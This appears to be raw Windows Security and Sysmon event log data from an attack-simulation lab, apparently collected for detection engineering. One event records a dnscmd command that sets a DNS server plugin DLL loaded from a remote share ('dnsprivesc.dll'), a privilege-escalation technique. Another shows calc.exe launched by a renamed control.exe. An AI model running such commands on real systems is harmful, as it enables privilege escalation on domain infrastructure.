4688 2 0 13312 0 0x8020000000000000 1421763 Security quadra.snapattack.labs S-1-5-21-421648065-3458498710-3574272164-2101 dadam SNAPATTACK 0x1b7190d 0x734 C:\Windows\System32\dnscmd.exe %%1936 0x1050 dnscmd 192.168.86.45 /config /serverlevelplugindll \\192.168.86.5\files\dnsprivesc.dll S-1-0-0 - - 0x0 C:\Windows\System32\cmd.exe S-1-16-8192
1 5 4 1 0 0x8000000000000000 17186 Microsoft-Windows-Sysmon/Operational quadra.snapattack.labs - 2023-10-24 18:41:14.574 BD1BA16A-0FCA-6538-C214-000000000F00 2624 C:\Windows\SysWOW64\calc.exe 10.0.19041.1 (WinBuild.160101.0800) Windows Calculator Microsoft® Windows® Operating System Microsoft Corporation CALC.EXE calc.exe C:\Users\dadam\ SNAPATTACK\dadam BD1BA16A-291D-62F5-0259-140000000000 0x145902 2 Medium MD5=961E093BE1F666FD38602AD90A5F480F,SHA256=B183BD6414C5123465075D76D2413C999D569492FB543ACBC29690B4B745BDF2,IMPHASH=BA072A972FE6C47C8CF7A0347BB0AF7A BD1BA16A-0FCA-6538-C114-000000000F00 8496 C:\Users\dadam\control.exe "C:\Users\dadam\control.exe" /name Microsoft.Workfolders SNAPATTACK\dadam